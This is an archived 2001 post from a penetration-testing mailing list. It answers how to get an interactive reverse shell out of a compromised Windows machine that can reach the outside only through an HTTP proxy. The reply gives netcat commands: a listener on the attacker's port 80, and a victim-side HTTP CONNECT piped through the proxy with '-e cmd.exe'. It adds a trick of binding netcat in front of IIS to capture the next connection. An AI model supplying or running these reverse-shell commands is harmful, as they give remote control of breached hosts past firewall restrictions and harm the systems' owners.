Penetration Testing mailing list archives
Re: Reverse Http Shell Solution
From: "Jody Melbourne" <jody.melbourne () itacsecurity com>
Date: Fri, 19 Oct 2001 12:30:36 +1000
Hi,
Does anybody know any solution based on the remote shell in Win32 machines using Reverse Telnet thru Proxies? The proxy only permits HTTP 80/8080.
I think your situation is this: You have owned a machine which is behind a firewall, and it only allows connections out via a proxy, so simple reverse telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail. You could try something like this: Attacker: netcat -v -l -p 80 Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e cmd.exe The HTTP/1.1 CONNECT method is the only way I can see you getting a nice interactive command prompt if ports 80/8080 outbound are all you have to play with. Remember that netcat can bind in FRONT of the existing IIS process. If you spawn as netcat listener on 80, 443, 21, etc.. with the '-l' (listen once) option, the next person to connect to that port will get the netcat listener. Any subsequent connections will see the IIS service. cheers .jm ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Reverse Http Shell Solution Vinicius Dalesandro (Oct 18)
- Re: Reverse Http Shell Solution Jody Melbourne (Oct 19)
- <Possible follow-ups>
- Fwd: Reverse Http Shell Solution GrandmastrPlague (Oct 18)
- RE: Reverse Http Shell Solution Frank Knobbe (Oct 18)
- RE: Reverse Http Shell Solution David Sexton (Oct 19)